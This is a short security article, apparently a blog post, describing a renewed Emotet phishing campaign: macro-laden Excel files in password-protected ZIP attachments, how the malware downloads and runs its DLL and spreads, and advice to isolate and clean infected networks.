The most famous botnet complicit in cyber crime returns. It targets a lot of organizations with Zip attachment containing an Excel file with malicious macro.

Emotet is back with a new campaign targeting organizations to spread emails with a ZIP-compressed archive attached. Password-protected: the file contains an Excel with a malicious macro.
The infection chain of the malware, which spreads via phishing, is the same: it exploits four dropurl from the macro, partially readable directly from the XLS file, targeting the download of the Emotet (64bit) DLL and execution via regsvr32 command.

The spread of malware through compromised Excel or Word documents sent via e-mail, using phishing techniques.

How Emotet works?

The user is tricked into opening documents that in turn activate macros, resulting in the download of the Emotet DLL file and its loading into memory. From here, the malware begins its operations, which are the search and theft of e-mails to be used in subsequent spam campaigns.

Its main goal is to gain access to foreign devices and spy on sensitive private data, thus deceiving and hiding from basic Anti-Virus software.
Once the target systems are infected, the malware spreads like a Worm, trying to infiltrate other systems in the target network.

Emotet malware targets companies, organizations, and authorities. It is also estimated that many companies infected with the malware have not reported the breach for fear of damaging their reputation.

Emotet is spread primarily through e-mail. The trojan reads emails from already infected users and creates fictitious deceptive content. At first, these emails appear legitimate and personal, not looking like Spam emails. However, Emotet sends these phishing emails to contacts filed as co-workers.

Emotet characterstics

Most of the time, the emails contain an infected .doc file for the recipient to download or a dangerous link. The correct name is always displayed as the sender, leading recipients to believe that the message is legitimate and then the malicious file is downloaded and executed the malicious file.

Often the malware uses macros to launch a scripting engine such as cscript, wscript, or other scripting languages. In addition, PowerShell, WMI or other Windows administrative utilities have also been used in this context. Endpoint Detection and Response (EDR) solutions usually monitor these parent-child relationships and are activated when Office documents attempt to run nonstandard programs.

The decoded script contains a list of URLs where the Emotet payload is hosted. Once executed, it iterates through the list and makes a request using the Invoke-WebRequest function of PowerShell. If the binary is successfully downloaded, it saves the file in the Windows temporary directory and executes it using regsvr32.exe.

In order for us to protect ourselves from malware, it is necessary to isolate the involved device if it is connected to a network in order to reduce the risk of spreading malware.
Because Emotet is polymorphic, an uninfected system can be quickly re-infected if it is connected to an infected network. Therefore, it is profitable to perform cleanup of all devices connected to the network in order to reduce the spread of malware in the current network